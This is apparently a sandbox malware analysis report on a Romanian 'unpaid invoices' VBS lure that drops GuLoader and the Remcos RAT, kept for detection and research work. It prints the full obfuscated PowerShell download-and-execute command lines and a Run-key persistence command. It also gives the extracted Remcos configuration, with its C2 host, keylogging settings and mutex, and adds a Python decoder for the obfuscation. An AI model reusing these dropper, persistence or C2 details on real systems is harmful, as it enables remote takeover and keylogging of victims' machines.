

Windows Analysis Report
IMGRO Facturi nepl#U0103tite 56773567583658567835244234Bandido.vbs

Overview

General Information

Sample name: IMGRO Facturi nepl#U0103tite 56773567583658567835244234Bandido.vbs
(renamed by the sandbox: the original name contains a non-ASCII character, Romanian ă (U+0103), which is written as #U0103; "Facturi neplătite" is Romanian for "unpaid invoices", a billing-themed lure)
Original sample name: IMGRO Facturi neplătite 56773567583658567835244234Bandido.vbs
Analysis ID: 1538533
MD5: a8da570deac5f16a0050802c0da5d7dd
SHA1: 9d8992e3770e41d8a431350e1cef73492dc240ea
SHA256: c51c0afd1207879df1f42ac10c7c0bca5397c6b461a6423dbe58b091dc659e6d
Tags: vbs, user-lowmal3

Detection

Remcos, GuLoader
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Detected Remcos RAT
Early bird code injection technique detected
Found malware configuration
Malicious sample detected (through community Yara rule)
Sigma detected: Remcos
Suricata IDS alerts for network traffic
VBScript performs obfuscated calls to suspicious functions
Yara detected GuLoader
Yara detected Powershell download and execute
Yara detected Remcos RAT
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found suspicious powershell code related to unpacking or dynamic code loading
Potential evasive VBS script found (sleep loop)
Queues an APC in another process (thread injection)
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Uses dynamic DNS services
Uses ping.exe to check the status of other devices and networks
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Abnormal high CPU Usage
Checks if the current process is being debugged
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Direct Autorun Keys Modification
Sigma detected: Msiexec Initiated Connection
Sigma detected: Potential Persistence Attempt Via Run Keys Using Reg.EXE
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Sleep loop found (likely to delay execution)
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses reg.exe to modify the Windows registry
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara signature match

Classification

  • System is w10x64
  • wscript.exe (PID: 7768 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\IMGRO Facturi nepl#U0103tite 56773567583658567835244234Bandido.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • PING.EXE (PID: 7808 cmdline: ping gormezl_6777.6777.6777.677e MD5: 2F46799D79D22AC72C241EC0322B011D)
      • conhost.exe (PID: 7816 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 7876 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Servicetilbuds Fangerne Sidsernes Cormidium Brnesangen Pouty #>;$Tredjeverdenslandets='Bilberries43';<#Efterordenes fjedervgt Soubrettens leftism Radiography #>;$Saltvandsfisk=$selvvirkendes+$host.UI; function pepperiness($Klassesttet){If ($Saltvandsfisk) {$Envisaging++;}$possesses=$Unlimned+$Klassesttet.'Length'-$Envisaging; for( $Multiciliated=4;$Multiciliated -lt $possesses;$Multiciliated+=5){$Aithochroi56=$Multiciliated;$Politiskoler+=$Klassesttet[$Multiciliated];$Opbyggeligste='Weltanschauung';}$Politiskoler;}function Isopor($jomfrunalske){ & ($Hovedkarakterer) ($jomfrunalske);}$Folkeskoleomraadet=pepperiness 'IsolMAnlgoEffez noriEssolGanglin,ta Lig/ Bl, ';$Folkeskoleomraadet+=pepperiness 'Refr5ra e.Spot0omda Mulc(IndtW DisiBespn Dd dModao A,cwKultsFedt igN avT Ten fi.1slay0Thom.Unde0Stav;Ahop Lo iW teriKravnKurs6Sis.4Engr;Tank HjrxOpti6Rhyp4Incr; ete TrasrGeo v ,es: yr1Dile3 Tai1 Bio. 
alg0 Pos)Perp ForsG OuteMaancZan.kCathoBart/ Che2Vold0Pauc1Sluk0 Chi0 S a1 ea0w.re1Prog GynoFBelviLokar ndeeLegefHe soNonrxNett/halv1,eta3Ku m1Data.Upbu0 Gui ';$Efterords=pepperiness 'DiktuPhotsOverE orlrK.od-Job aForbg KofeSy,bnRisitProg ';$Ordreafgivelser=pepperiness 'UnmehTeletGrost enpImplsUdtr:Sols/Mora/Kanopov rlP rsi AlleSenslForstBlyadB,nz.Hy.etbil,oR afpBakk/BeasT isclUdtnlChile B esIdio1Barb8glut7Time.F,agdMadke S lpDokul In oSendySubc ';$haole=pepperiness 'tetr>Wels ';$Hovedkarakterer=pepperiness 'CockIdumhe SinXAnse ';$Kontrahering='Tekstlig';$Jackhammer='\Clothesman.Vin';Isopor (pepperiness 'Thig$ BraGStemlCordoMarvBPostaEthiLCibo:OverE psVTe.meJagtLSatiE,easeDe enArmhs Asp=Unit$Brute OttnS utVexpr:T,veaEncrp HaaP ondalfaAPe sT HofAsymp+Bobs$ Kvsj En AMatacMisakNoteH,orlaTomeMPeptMPrese oldRBus ');Isopor (pepperiness 'Hard$Und gSociLTveto WoobPar anotal ead:SkamfHestoUdsiRDraiMDissA A tlpo,yIDis SKrameart S Sen=Chil$disiOWorrr eaDDemoR MaeEFigeaF gef Drag limIRe.rvForaECuralEd csReolEKobbr Cla.StatS,lebp LisL LanIBoggtS ag(H,po$SemihMa,iASnito.onpLOctreacet)Told ');Isopor (pepperiness ' Und[SwifnstabETsumT.agt.ForuSGeneERadircemev StriTilnC .ekEOctopRed.oKleiI Sa NGav.T bscM,kraAUnclNBnnea,nnigPh,ce MolR nrt] B,l:Succ:MusksProgev.rdcSt.aUFl.tRd ndI FlytJaywYjvnfpParaRWineOInfithummoDolocRom oSignLMidt Cecr=Foru Excr[Kaian.emie.lgttU ru. 
RhasH,rpeve,ecEndiuAsteRPro iLallT egeYTuvaPT anroutgoFarmT TabODyrlcStauOBobbL StuTVoicy ussPU saeAtio]Oec,:grat: esstMidnlchteS Non1Ca.o2Ddsr ');$Ordreafgivelser=$Formalises[0];$Gammel=(pepperiness 'S it$predgEstalLe iOUninbK alaEnteL Sax:M drL nivIIntent kuIParmESvrtn CyluBo.dm ComMCr dePlicrSynteSkylr disiB,rrnP rsGJeopeKravrskld= PosN taoERepewDugp- Geno AdebMilij ti EGalvcImprtPi.k autoS marYFor.S,aratStudeUnflMT,ta.SkatNPepeE IgntHjem.DephwUdtrEHrigBDevaCOrdsl ForISalte ilinSy,cthust ');Isopor ($Gammel);Isopor (pepperiness 'Kvid$intelIndbi NebnMilii Tote HypnSnuruReprmVitamM.tteU.virEnhee ClirSnd iNovenDeflg.orkeAerorMorb.TawpHRunoeLullade rdDerfeDagsrBe,tsStre[Forb$modiE AfrfWheetNonce co.rTermo.ragrB.lodKlags Int]O tl=Ek,k$VersFA shoGldelFor kA seeU,nvslopskForso anl,edteDrogoRumfmGlosrSesaaGrnlaAnatdSrileS,uttLawy ');$cosmozoism=pepperiness 'Afve$TelelBryliLys,n nniiOv reFu dnVirkuV dem Emam V neRctsrSaeseEtior riliUn.rnSt,agSubaeAf irOutb. rbeD BlooVan w ndnDipllVaaroWoora nond HetFnon iFormlLandeAci (,ill$ aerO repr Ob d PrerAn.heNavnaPresf otagFulwi agtvAmmoeTid lSoupsB uge subrShi.,Elsk$ StrS penp ,egoS gdnImp.g eryiUndeo Rusp imol unoaReissTeksm SmuiTo dcRust) Tek ';$Spongioplasmic=$Eveleens;Isopor (pepperiness 'Udem$BortG Po lGobyoInvab nikaPeril Maz:DiskI ForNAcraDabsttB ndSUforE BloDPr aeBrak=mi c(Udt TNedjeStedsBe atOkke-SnubpLaerASoriT.ineH ska R,ti$ B,iS.nesp K iOse,in yomg novIS ygOKontP S dlCenta VilsBatcM knii HekC Svi) Unm ');while (!$Indtsede) {Isopor (pepperiness ' M s$FaragOve.l TreoRetibR koaClogl usl:F,stSTurbkSmalu ecke GresDo ip ,tvi .onlattelMin,eSad.rVltee.edrv LoenDerme E e= Bio$ kvtExt rRealuCel eEqua ') ;Isopor $cosmozoism;Isopor (pepperiness 'FishsFoelTKonfa Po r Rh TUdve-G,mnsUnpulPosseObjeEhellpOpsa Tetr4 Cor ');Isopor (pepperiness 'Ny.e$ ocGSvmmL HecoDistB,ortA FraLPrez:SensiTuskNDov dMakst EkssspineUninDTrosETakt= Bor( Urit Afse pensDeprtE ep- WasP ieaForeT rocH Haa Per$Re.isSocipSkilO DomNPul,gConvIParaOud epHyl,L 
O,eAClanSE olM apiNavnc esk)Raad ') ;Isopor (pepperiness 'Uddy$ PreGRedelH reO imibKredANo dlR.gi:,vinpSilkAWadsNtrondSlavEFunkHFodbuwoadLa,dsEKlasrDovn=A au$U feGClamlOm,oO StubS.xoAT rsLAlfa: rbesHealtForbOUnpor Undkpr,nu ShonPeplDS,aieCymbRVareaG.ldbB anAIch TTrniTAzonerun.N enfsw ir+Konv+Udf % Afg$ HvifArchoTeleROve mBap aRi ll Li I TvaS ickELnnuSConc.BehacVis,oUnsauHngen In t.igm ') ;$Ordreafgivelser=$Formalises[$pandehuler];}$Bortvend=334373;$Blodbanken=30661;Isopor (pepperiness ' For$DandGEnkeLMunkO T.nbT rsA ejnlInat: ptrC tidHUmb aGallR drbLTyndaBr.odToccyIndi Cl =Elem RodGOut eLageTVrik- SolcNickOTacknDrnlt SameBo,kN UletG.nf .gil$ SamsSandpTassoCottnPrdegRatiICreaOWandpwom LRea.a AskSBenaM TomiUdh CFree ');Isopor (pepperiness 'H lh$KradgNudelSk.io ProbKol,a ndelT,bs:HverJ,rtioNapabRicob Pr,eBolir enneStannTuers Fen Rib=Gnav Sleu[ParaSVeneyGratsCro tBullebresm Sub.FortCSi noHungn V,tvSkoveDiser Fortarau]Noni:Repu:OverFMn drStymo DemmPea BKollaLumbs Th,eUnre6 ,xp4Pr,vS RegtV,abrMiliiSyrlnAldrgerho(k rn$ psc nohtypeaPinsr osclGranaSistdGranyTerr)Brac ');Isopor (pepperiness 'Fore$GormgStemLSpolOStalBDid.a Eftlh ng:morttPr.guCoroCOverKGoweT RehoMohiO Tog Non = Raa Vagt[ Hovs CitYFostsTaabt jorEQui m om. ntiTGle,e UnoxCurlTOrga.,utrEZerenSub cChemOInfoDAdviiNedsN AdiGThou]Shun:Pers:tennaHimnSB.glCich.IKontiSosi. amegRoyae AprtSmmeSSandtUn,rRe vii Pr NFa sgRokk(Tank$Portj arnOLienBCle,BSpanEBigurParaE merN PonSSpo.)Odyl ');Isopor (pepperiness 'Unbu$UdtaG orhl ylOMar be spa CollMega:Molis TurEDortM T tIHoraCcsiuOItern GalV I aEL miNForeTPre,I aenOO ern NstAU ldl ssuI inktTs rYKnib=Skru$FiskTTronuFri.cstorK N nTUncooSadeoChan.M mbs PaaUHaanbDia,SAbantFamirquadi leunKampgSemi(Shin$ Un BSupeo BegR.lurtTi.vvAq aeSkrln SladEmne,Unde$ BorbForelAl.eO AdrdPro BTopmAScruNGurgkbrkneBlu N Lla) Una ');Isopor $Semiconventionality;" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7884 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • powershell.exe (PID: 8168 cmdline: "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" " <#Servicetilbuds Fangerne Sidsernes Cormidium Brnesangen Pouty #>;$Tredjeverdenslandets='Bilberries43';<#Efterordenes fjedervgt Soubrettens leftism Radiography #>;$Saltvandsfisk=$selvvirkendes+$host.UI; function pepperiness($Klassesttet){If ($Saltvandsfisk) {$Envisaging++;}$possesses=$Unlimned+$Klassesttet.'Length'-$Envisaging; for( $Multiciliated=4;$Multiciliated -lt $possesses;$Multiciliated+=5){$Aithochroi56=$Multiciliated;$Politiskoler+=$Klassesttet[$Multiciliated];$Opbyggeligste='Weltanschauung';}$Politiskoler;}function Isopor($jomfrunalske){ & ($Hovedkarakterer) ($jomfrunalske);}$Folkeskoleomraadet=pepperiness 'IsolMAnlgoEffez noriEssolGanglin,ta Lig/ Bl, ';$Folkeskoleomraadet+=pepperiness 'Refr5ra e.Spot0omda Mulc(IndtW DisiBespn Dd dModao A,cwKultsFedt igN avT Ten fi.1slay0Thom.Unde0Stav;Ahop Lo iW teriKravnKurs6Sis.4Engr;Tank HjrxOpti6Rhyp4Incr; ete TrasrGeo v ,es: yr1Dile3 Tai1 Bio. 
alg0 Pos)Perp ForsG OuteMaancZan.kCathoBart/ Che2Vold0Pauc1Sluk0 Chi0 S a1 ea0w.re1Prog GynoFBelviLokar ndeeLegefHe soNonrxNett/halv1,eta3Ku m1Data.Upbu0 Gui ';$Efterords=pepperiness 'DiktuPhotsOverE orlrK.od-Job aForbg KofeSy,bnRisitProg ';$Ordreafgivelser=pepperiness 'UnmehTeletGrost enpImplsUdtr:Sols/Mora/Kanopov rlP rsi AlleSenslForstBlyadB,nz.Hy.etbil,oR afpBakk/BeasT isclUdtnlChile B esIdio1Barb8glut7Time.F,agdMadke S lpDokul In oSendySubc ';$haole=pepperiness 'tetr>Wels ';$Hovedkarakterer=pepperiness 'CockIdumhe SinXAnse ';$Kontrahering='Tekstlig';$Jackhammer='\Clothesman.Vin';Isopor (pepperiness 'Thig$ BraGStemlCordoMarvBPostaEthiLCibo:OverE psVTe.meJagtLSatiE,easeDe enArmhs Asp=Unit$Brute OttnS utVexpr:T,veaEncrp HaaP ondalfaAPe sT HofAsymp+Bobs$ Kvsj En AMatacMisakNoteH,orlaTomeMPeptMPrese oldRBus ');Isopor (pepperiness 'Hard$Und gSociLTveto WoobPar anotal ead:SkamfHestoUdsiRDraiMDissA A tlpo,yIDis SKrameart S Sen=Chil$disiOWorrr eaDDemoR MaeEFigeaF gef Drag limIRe.rvForaECuralEd csReolEKobbr Cla.StatS,lebp LisL LanIBoggtS ag(H,po$SemihMa,iASnito.onpLOctreacet)Told ');Isopor (pepperiness ' Und[SwifnstabETsumT.agt.ForuSGeneERadircemev StriTilnC .ekEOctopRed.oKleiI Sa NGav.T bscM,kraAUnclNBnnea,nnigPh,ce MolR nrt] B,l:Succ:MusksProgev.rdcSt.aUFl.tRd ndI FlytJaywYjvnfpParaRWineOInfithummoDolocRom oSignLMidt Cecr=Foru Excr[Kaian.emie.lgttU ru. 
RhasH,rpeve,ecEndiuAsteRPro iLallT egeYTuvaPT anroutgoFarmT TabODyrlcStauOBobbL StuTVoicy ussPU saeAtio]Oec,:grat: esstMidnlchteS Non1Ca.o2Ddsr ');$Ordreafgivelser=$Formalises[0];$Gammel=(pepperiness 'S it$predgEstalLe iOUninbK alaEnteL Sax:M drL nivIIntent kuIParmESvrtn CyluBo.dm ComMCr dePlicrSynteSkylr disiB,rrnP rsGJeopeKravrskld= PosN taoERepewDugp- Geno AdebMilij ti EGalvcImprtPi.k autoS marYFor.S,aratStudeUnflMT,ta.SkatNPepeE IgntHjem.DephwUdtrEHrigBDevaCOrdsl ForISalte ilinSy,cthust ');Isopor ($Gammel);Isopor (pepperiness 'Kvid$intelIndbi NebnMilii Tote HypnSnuruReprmVitamM.tteU.virEnhee ClirSnd iNovenDeflg.orkeAerorMorb.TawpHRunoeLullade rdDerfeDagsrBe,tsStre[Forb$modiE AfrfWheetNonce co.rTermo.ragrB.lodKlags Int]O tl=Ek,k$VersFA shoGldelFor kA seeU,nvslopskForso anl,edteDrogoRumfmGlosrSesaaGrnlaAnatdSrileS,uttLawy ');$cosmozoism=pepperiness 'Afve$TelelBryliLys,n nniiOv reFu dnVirkuV dem Emam V neRctsrSaeseEtior riliUn.rnSt,agSubaeAf irOutb. rbeD BlooVan w ndnDipllVaaroWoora nond HetFnon iFormlLandeAci (,ill$ aerO repr Ob d PrerAn.heNavnaPresf otagFulwi agtvAmmoeTid lSoupsB uge subrShi.,Elsk$ StrS penp ,egoS gdnImp.g eryiUndeo Rusp imol unoaReissTeksm SmuiTo dcRust) Tek ';$Spongioplasmic=$Eveleens;Isopor (pepperiness 'Udem$BortG Po lGobyoInvab nikaPeril Maz:DiskI ForNAcraDabsttB ndSUforE BloDPr aeBrak=mi c(Udt TNedjeStedsBe atOkke-SnubpLaerASoriT.ineH ska R,ti$ B,iS.nesp K iOse,in yomg novIS ygOKontP S dlCenta VilsBatcM knii HekC Svi) Unm ');while (!$Indtsede) {Isopor (pepperiness ' M s$FaragOve.l TreoRetibR koaClogl usl:F,stSTurbkSmalu ecke GresDo ip ,tvi .onlattelMin,eSad.rVltee.edrv LoenDerme E e= Bio$ kvtExt rRealuCel eEqua ') ;Isopor $cosmozoism;Isopor (pepperiness 'FishsFoelTKonfa Po r Rh TUdve-G,mnsUnpulPosseObjeEhellpOpsa Tetr4 Cor ');Isopor (pepperiness 'Ny.e$ ocGSvmmL HecoDistB,ortA FraLPrez:SensiTuskNDov dMakst EkssspineUninDTrosETakt= Bor( Urit Afse pensDeprtE ep- WasP ieaForeT rocH Haa Per$Re.isSocipSkilO DomNPul,gConvIParaOud epHyl,L 
O,eAClanSE olM apiNavnc esk)Raad ') ;Isopor (pepperiness 'Uddy$ PreGRedelH reO imibKredANo dlR.gi:,vinpSilkAWadsNtrondSlavEFunkHFodbuwoadLa,dsEKlasrDovn=A au$U feGClamlOm,oO StubS.xoAT rsLAlfa: rbesHealtForbOUnpor Undkpr,nu ShonPeplDS,aieCymbRVareaG.ldbB anAIch TTrniTAzonerun.N enfsw ir+Konv+Udf % Afg$ HvifArchoTeleROve mBap aRi ll Li I TvaS ickELnnuSConc.BehacVis,oUnsauHngen In t.igm ') ;$Ordreafgivelser=$Formalises[$pandehuler];}$Bortvend=334373;$Blodbanken=30661;Isopor (pepperiness ' For$DandGEnkeLMunkO T.nbT rsA ejnlInat: ptrC tidHUmb aGallR drbLTyndaBr.odToccyIndi Cl =Elem RodGOut eLageTVrik- SolcNickOTacknDrnlt SameBo,kN UletG.nf .gil$ SamsSandpTassoCottnPrdegRatiICreaOWandpwom LRea.a AskSBenaM TomiUdh CFree ');Isopor (pepperiness 'H lh$KradgNudelSk.io ProbKol,a ndelT,bs:HverJ,rtioNapabRicob Pr,eBolir enneStannTuers Fen Rib=Gnav Sleu[ParaSVeneyGratsCro tBullebresm Sub.FortCSi noHungn V,tvSkoveDiser Fortarau]Noni:Repu:OverFMn drStymo DemmPea BKollaLumbs Th,eUnre6 ,xp4Pr,vS RegtV,abrMiliiSyrlnAldrgerho(k rn$ psc nohtypeaPinsr osclGranaSistdGranyTerr)Brac ');Isopor (pepperiness 'Fore$GormgStemLSpolOStalBDid.a Eftlh ng:morttPr.guCoroCOverKGoweT RehoMohiO Tog Non = Raa Vagt[ Hovs CitYFostsTaabt jorEQui m om. ntiTGle,e UnoxCurlTOrga.,utrEZerenSub cChemOInfoDAdviiNedsN AdiGThou]Shun:Pers:tennaHimnSB.glCich.IKontiSosi. amegRoyae AprtSmmeSSandtUn,rRe vii Pr NFa sgRokk(Tank$Portj arnOLienBCle,BSpanEBigurParaE merN PonSSpo.)Odyl ');Isopor (pepperiness 'Unbu$UdtaG orhl ylOMar be spa CollMega:Molis TurEDortM T tIHoraCcsiuOItern GalV I aEL miNForeTPre,I aenOO ern NstAU ldl ssuI inktTs rYKnib=Skru$FiskTTronuFri.cstorK N nTUncooSadeoChan.M mbs PaaUHaanbDia,SAbantFamirquadi leunKampgSemi(Shin$ Un BSupeo BegR.lurtTi.vvAq aeSkrln SladEmne,Unde$ BorbForelAl.eO AdrdPro BTopmAScruNGurgkbrkneBlu N Lla) Una ');Isopor $Semiconventionality;" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
    • conhost.exe (PID: 8176 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • msiexec.exe (PID: 1012 cmdline: "C:\Windows\SysWOW64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)
      • cmd.exe (PID: 7432 cmdline: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Sandsynliggrelsens" /t REG_EXPAND_SZ /d "%Hexokinase% -windowstyle 1 $Jordbundssammenstnings=(gp -Path 'HKCU:\Software\Skulptureredes\').carlcorey;%Hexokinase% ($Jordbundssammenstnings)" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 2136 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • reg.exe (PID: 7664 cmdline: REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Sandsynliggrelsens" /t REG_EXPAND_SZ /d "%Hexokinase% -windowstyle 1 $Jordbundssammenstnings=(gp -Path 'HKCU:\Software\Skulptureredes\').carlcorey;%Hexokinase% ($Jordbundssammenstnings)" MD5: CDD462E86EC0F20DE2A1D781928B1B0C)
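The `pepperiness` function in the two PowerShell command lines above (PID 7876, and PID 8168, the 32-bit SysWOW64 copy of the same script that goes on to spawn msiexec.exe) is the whole obfuscation layer: every quoted literal is decoded by keeping one character in five, starting at offset 4, and the `Isopor` helper runs `& $Hovedkarakterer` on the result, where `$Hovedkarakterer` itself decodes to `IeX` (Invoke-Expression). The Python below re-implements that decoder so the literals can be recovered offline. It is an added example, not code from the sample or from Joe Sandbox; the literals embedded in `SAMPLE` are copied from the PID 7876 command line and their decoded values were checked by hand. Caveat: the HTML export of this report stripped non-ASCII letters (æ, ø, å) from several literals, which shifts the five-character stride, so run the decoder on the command line as captured by the sandbox or by Sysmon / PowerShell script-block logging, not on the text of this page.

```python
"""Stride decoder for the PowerShell string obfuscation used by this GuLoader
dropper (the sample's pepperiness/Isopor helpers). Added example, not code from
the sample or from Joe Sandbox."""
import re

START = 4    # pepperiness(): for ($Multiciliated=4; ...
STRIDE = 5   # ...; $Multiciliated+=5): keep one character in five

# Literals copied verbatim from the PID 7876 command line in the report.
SAMPLE = (
    "$Folkeskoleomraadet=pepperiness 'IsolMAnlgoEffez noriEssolGanglin,ta Lig/ Bl, ';"
    "$Efterords=pepperiness 'DiktuPhotsOverE orlrK.od-Job aForbg KofeSy,bnRisitProg ';"
    "$haole=pepperiness 'tetr>Wels ';"
    "$Hovedkarakterer=pepperiness 'CockIdumhe SinXAnse ';"
)


def pepperiness(blob: str, host_ui_present: bool = True) -> str:
    """Re-implementation of the sample's decoder.

    The script sets $Envisaging=1 when $host.UI exists (always, in a real
    console host), so the loop bound is len-1 and the trailing pad character
    of every literal is dropped. host_ui_present=False reproduces the other
    branch, which keeps that last character."""
    bound = len(blob) - (1 if host_ui_present else 0)
    return "".join(blob[i] for i in range(START, bound, STRIDE))


def decode_literals(script: str) -> list:
    """Return (variable, decoded) pairs for every pepperiness '<literal>' call
    in an obfuscated command line. Calls that are not a plain
    $var=pepperiness '...' / $var+=pepperiness '...' assignment get None."""
    pairs = []
    for m in re.finditer(r"(?:\$(\w+)\s*\+?=\s*)?pepperiness\s+'([^']*)'", script):
        pairs.append((m.group(1), pepperiness(m.group(2))))
    return pairs


if __name__ == "__main__":
    for var, plain in decode_literals(SAMPLE):
        print(f"{var!s:20} -> {plain!r}")
    # $Hovedkarakterer -> 'IeX': Isopor is a thin wrapper around Invoke-Expression,
    # and the first two literals start a Firefox User-Agent header.
```

Because the stride ignores four characters out of five, the filler letters are free to look like natural Danish/English text, which is why a keyword-only scan of the command line finds nothing. The useful hunt signal is structural: a function that indexes `$str[$i]` in a loop with a constant step, feeding `&` / `IeX` with its output.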
Malware family: Remcos (RemcosRAT)
Description: Remcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers. Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns. Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user. Remcos is developed by the cybersecurity company BreakingSecurity.
Attribution:
  • APT33
  • The Gorgon Group
  • UAC-0050
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos

Malware family: CloudEyE (GuLoader)
Description: CloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.
Attribution: none
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye
Malware configuration (Remcos, extracted from memory; "Keylog folder" + "Keylog file" give the C:\ProgramData\remcos\logs.dat seen in the Yara and file-creation entries below):
{
  "Host:Port:Password": ["pelele.duckdns.org:51525:1"],
  "Assigned name": "MISS Chy",
  "Connect interval": "1",
  "Install flag": "Disable",
  "Setup HKCU\\Run": "Enable",
  "Setup HKLM\\Run": "Enable",
  "Install path": "Application path",
  "Copy file": "remcos.exe",
  "Startup value": "Disable",
  "Hide file": "Disable",
  "Mutex": "Rmc-TXCR8B",
  "Keylog flag": "1",
  "Keylog path": "Application path",
  "Keylog file": "logs.dat",
  "Keylog crypt": "Disable",
  "Hide keylog file": "Disable",
  "Screenshot flag": "Disable",
  "Screenshot time": "1",
  "Take Screenshot option": "Disable",
  "Take screenshot title": "",
  "Take screenshot time": "5",
  "Screenshot path": "AppData",
  "Screenshot file": "Screenshots",
  "Screenshot crypt": "Disable",
  "Mouse option": "Disable",
  "Delete file": "Disable",
  "Audio record time": "5",
  "Audio folder": "MicRecords",
  "Connect delay": "0",
  "Copy folder": "Remcos",
  "Keylog folder": "remcos"
}
Yara matches (dropped file and memory dumps):
Source | Rule | Description | Author
C:\ProgramData\remcos\logs.dat | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security
0000000A.00000002.2937740641.0000000007D00000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security
00000005.00000002.1994393544.00000000089E0000.00000040.00001000.00020000.00000000.sdmp | JoeSecurity_GuLoader_5 | Yara detected GuLoader | Joe Security
0000000A.00000002.2949377378.000000002377E000.00000004.00000010.00020000.00000000.sdmp | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security
0000000A.00000002.2937740641.0000000007CD0000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security
00000005.00000002.1982397865.0000000005F76000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_GuLoader_5 | Yara detected GuLoader | Joe Security
(7 further memory-dump matches are collapsed in the original report)
Yara matches (AMSI script buffers):
Source | Rule | Description | Author
amsi64_7876.amsi.csv | JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security
amsi32_8168.amsi.csv | INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC | Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution | ditekSHen
Matched strings (offset:identifier: content):
                • 0xc479:$b2: ::FromBase64String(
                • 0xb4e5:$s1: -join
                • 0x4c91:$s4: +=
                • 0x4d53:$s4: +=
                • 0x8f7a:$s4: +=
                • 0xb097:$s4: +=
                • 0xb381:$s4: +=
                • 0xb4c7:$s4: +=
                • 0x155ff:$s4: +=
                • 0x1567f:$s4: +=
                • 0x15745:$s4: +=
                • 0x157c5:$s4: +=
                • 0x1599b:$s4: +=
                • 0x15a1f:$s4: +=
                • 0xbd1e:$e4: Get-WmiObject
                • 0xbf0d:$e4: Get-Process
                • 0xbf65:$e4: Start-Process
                • 0x16290:$e4: Get-Process

                System Summary

Source: Process started | Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community | Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\IMGRO Facturi nepl#U0103tite 56773567583658567835244234Bandido.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\IMGRO Facturi nepl#U0103tite 56773567583658567835244234Bandido.vbs", CommandLine|base64offset|contains: -, Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\IMGRO Facturi nepl#U0103tite 56773567583658567835244234Bandido.vbs", ProcessId: 7768, ProcessName: wscript.exe
Source: Registry Key set | Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split) | Data: Details: %Hexokinase% -windowstyle 1 $Jordbundssammenstnings=(gp -Path 'HKCU:\Software\Skulptureredes\').carlcorey;%Hexokinase% ($Jordbundssammenstnings), EventID: 13, EventType: SetValue, Image: C:\Windows\SysWOW64\reg.exe, ProcessId: 7664, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Sandsynliggrelsens
